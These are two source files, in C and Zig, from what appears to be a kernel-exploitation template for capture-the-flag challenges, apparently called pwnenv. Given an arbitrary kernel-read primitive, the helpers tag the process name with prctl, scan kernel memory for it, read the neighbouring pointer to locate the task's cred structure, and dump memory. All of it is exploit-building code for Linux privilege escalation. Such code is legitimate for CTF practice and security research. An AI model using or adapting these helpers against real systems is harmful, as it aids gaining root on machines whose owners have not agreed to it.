File: pwnenv/kernel/template/aar.c
#include <assert.h>
#define prctl_mm_map prctl_mm_map_conflict
#include <linux/prctl.h>
#undef prctl_mm_map
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/prctl.h>

#include "util.h"

static bool found_target(void *const addr, void *const target, const u64 len, u32 (*aar32)(void *),
                         u64 (*aar64)(void *)) {
    if (likely(aar32 != NULL)) {
        for (u64 offset = 0; offset < len; offset += 4) {
            u32 actual;
            u32 expect;
            if (likely(offset + 4 <= len)) {
                actual = aar32(addr + offset);
                expect = *(u32 *)(target + offset);
            } else {
                u64 rest = len - offset;
                actual = aar32(addr + offset);
                expect = (*(u32 *)(target + offset)) & ((1u << (8 * rest)) - 1);
            }
            if (likely(actual != expect)) {
                return false;
            }
        }
        return true;
    }
    if (aar64 != NULL) {
        for (u64 offset = 0; offset < len; offset += 8) {
            u64 actual;
            u64 expect;
            if (likely(offset + 8 <= len)) {
                actual = aar64(addr + offset);
                expect = *(u64 *)(target + offset);
            } else {
                u64 rest = len - offset;
                actual = aar64(addr + offset);
                expect = (*(u64 *)(target + offset)) & ((1ull << (8 * rest)) - 1);
            }
            if (likely(actual != expect)) {
                return false;
            }
        }
        return true;
    }
    return false;
}

void *find_target_from_heap(void *const addr_start, void *const target, const u64 len,
                            u32 (*aar32)(void *), u64 (*aar64)(void *)) {
    if (unlikely(aar32 == NULL && aar64 == NULL)) {
        log_error("please implement aar function");
        return NULL;
    }

    u64 addr;
    if (likely(aar32 != NULL)) {
        for (addr = (u64)addr_start;; addr += 8) {
            if ((addr & 0xffff) == 0) {
                log_with_prefix("     ", "searching %p...", (void *)addr);
            }
            if (found_target((void *)addr, target, len, aar32, NULL)) {
                log_success("found target at %p", (void *)addr);
                return (void *)addr;
            }
        }
    } else if (aar64 != NULL) {
        for (addr = (u64)addr_start;; addr += 8) {
            if ((addr & 0xffff) == 0) {
                log_with_prefix("     ", "searching %p...", (void *)addr);
            }
            if (found_target((void *)addr, target, len, NULL, aar64)) {
                log_success("found target at %p", (void *)addr);
                return (void *)addr;
            }
        }
    }
    return NULL;
}

void *find_comm(void *const addr_start, u32 (*aar32)(void *), u64 (*aar64)(void *)) {
    char name[] = "kernel pwnable";
    assert(sizeof(name) <= 16);
    CHECK(prctl(PR_SET_NAME, name));
    log_info("start searching comm from %p", addr_start);
    return find_target_from_heap(addr_start, name, sizeof(name), aar32, aar64);
}

void *comm_to_addr_cred(void *const addr_comm, u32 (*aar32)(void *), u64 (*aar64)(void *)) {
    log_info("locating current->cred from current->comm");
    if (unlikely(aar32 == NULL && aar64 == NULL)) {
        log_error("please implement aar function");
        return NULL;
    }

    u64 addr_cred = 0;
    if (likely(aar32 != NULL)) {
        addr_cred |= aar32(addr_comm - 8);
        addr_cred |= (u64)aar32(addr_comm - 4) << 32;
        log_success("current->cred at %p", (void *)addr_cred);
    } else if (aar64 != NULL) {
        addr_cred |= aar64(addr_comm - 8);
        log_success("current->cred at %p", (void *)addr_cred);
    }
    return (void *)addr_cred;
}

void dump_buffer_aar(void *const addr_start, const u64 row, u32 (*aar32)(void *),
                     u64 (*aar64)(void *)) {
    if (unlikely(aar32 == NULL && aar64 == NULL)) {
        log_error("please implement aar function");
        return;
    }

    log_info("buffer dump by aar from %p", addr_start);
    if (likely(aar32 != NULL)) {
        for (u64 i = 0; i < row; i++) {
            u64 val = 0;
            val |= aar32(addr_start + i * 8);
            val |= (u64)aar32(addr_start + i * 8 + 4) << 32;
            u8 ascii[9] = {0};
            *(u64 *)ascii = val;
            for (u64 j = 0; j < 8; j++) {
                if (ascii[j] < 0x20 || 0x7e < ascii[j]) {
                    ascii[j] = '.';
                }
            }
            log_with_prefix("     ", "%p|+0x%03lx: 0x%016lx  |%.8s|", addr_start + i * 8, i * 8,
                            val, ascii);
        }
    } else if (aar64 != NULL) {
        for (u64 i = 0; i < row; i++) {
            u64 val = aar64(addr_start + i * 8);
            u8 ascii[9] = {0};
            *(u64 *)ascii = val;
            for (u64 j = 0; j < 8; j++) {
                if (ascii[j] < 0x20 || 0x7e < ascii[j]) {
                    ascii[j] = '.';
                }
            }
            log_with_prefix("     ", "%p|+0x%03lx: 0x%016lx  |%.8s|", addr_start + i * 8, i * 8,
                            val, ascii);
        }
    }
}

File: pwnenv/kernel/kzig/aar.zig
const std = @import("std");
const lnx = @import("linux.zig");

fn fn_type(comptime F: type) type {
    return switch (@typeInfo(F)) {
        .Fn => F,
        .Pointer => |p| switch (@typeInfo(p.child)) {
            .Fn => p.child,
            else => @compileError("expected fn or *const fn"),
        },
        else => @compileError("expected fn or *const fn"),
    };
}

fn reader_word_type(comptime Reader: type) type {
    const info = @typeInfo(fn_type(Reader)).Fn;

    if (info.params.len != 1) {
        @compileError("reader must be fn(usize) u32|u64");
    }

    const addr_t = info.params[0].type orelse @compileError("reader param0 must have type");
    const word_t = info.return_type orelse @compileError("reader must have return type");

    if (addr_t != usize) {
        @compileError("reader param0 must be usize address");
    }

    if (word_t != u32 and word_t != u64) {
        @compileError("reader return type must be u32 or u64");
    }

    return word_t;
}

fn found_target(addr: usize, target: []const u8, reader: anytype) bool {
    const word_t = reader_word_type(@TypeOf(reader));
    const word_size: usize = @sizeOf(word_t);
    const chunk_t = [word_size]u8;

    var offset: usize = 0;
    while (offset < target.len) : (offset += word_size) {
        var actual: word_t = reader(addr + offset);

        var chunk: chunk_t = std.mem.zeroes(chunk_t);
        const part = target[offset..@min(offset + word_size, target.len)];
        @memcpy(chunk[0..part.len], part);
        var expected: word_t = std.mem.readInt(word_t, &chunk, .little);

        if (part.len < word_size) {
            const shift_amt: std.math.Log2Int(word_t) = @intCast(part.len * 8);
            const mask: word_t = (@as(word_t, 1) << shift_amt) - 1;
            actual &= mask;
            expected &= mask;
        }

        if (actual != expected) {
            return false;
        }
    }

    return true;
}

pub fn find_target_from_heap(addr_start: usize, target: []const u8, reader: anytype) ?usize {
    var addr = addr_start;
    while (true) : (addr += 8) {
        if ((addr & 0xffff) == 0) {
            std.debug.print("      searching 0x{x}...\n", .{addr});
        }

        if (found_target(addr, target, reader)) {
            std.debug.print("[+] found target at 0x{x}\n", .{addr});
            return addr;
        }
    }

    return null;
}

pub fn find_comm(addr_start: usize, reader: anytype) ?usize {
    // Set current->comm (task name) so we can search it in kernel memory.
    var name_buf: [16]u8 = std.mem.zeroes([16]u8);
    const name = "maimai";
    @memcpy(name_buf[0..name.len], name);
    _ = lnx.check(lnx.os.prctl(lnx.pr_set_name, @intFromPtr(name_buf[0..].ptr), 0, 0, 0), "prctl(PR_SET_NAME)");

    const target = "maimai\x00";
    std.debug.print("[ ] start searching comm from 0x{x}\n", .{addr_start});
    return find_target_from_heap(addr_start, target, reader);
}

pub fn comm_to_addr_cred(addr_comm: usize, reader: anytype) ?usize {
    std.debug.print("[ ] locating current->cred from current->comm\n", .{});

    const word_t = reader_word_type(@TypeOf(reader));

    var addr_cred: u64 = 0;
    if (comptime word_t == u32) {
        addr_cred |= reader(addr_comm - 8);
        addr_cred |= @as(u64, reader(addr_comm - 4)) << 32;
    } else if (comptime word_t == u64) {
        addr_cred = reader(addr_comm - 8);
    } else {
        @compileError("unreachable: word_t must be u32 or u64");
    }

    std.debug.print("[+] current->cred at 0x{x}\n", .{addr_cred});
    return addr_cred;
}

pub fn dump_buffer_aar(addr_start: usize, row: u64, reader: anytype) void {
    const word_t = reader_word_type(@TypeOf(reader));

    std.debug.print("[ ] buffer dump by aar from 0x{x}\n", .{addr_start});

    var i: u64 = 0;
    while (i < row) : (i += 1) {
        var val: u64 = 0;

        if (comptime word_t == u32) {
            val |= reader(addr_start + i * 8);
            val |= @as(u64, reader(addr_start + i * 8 + 4)) << 32;
        } else if (comptime word_t == u64) {
            val = reader(addr_start + i * 8);
        }

        std.debug.print("      0x{x}|+0x{x:0>3}: 0x{x:0>16}\n", .{ addr_start + i * 8, i * 8, val });
    }
}
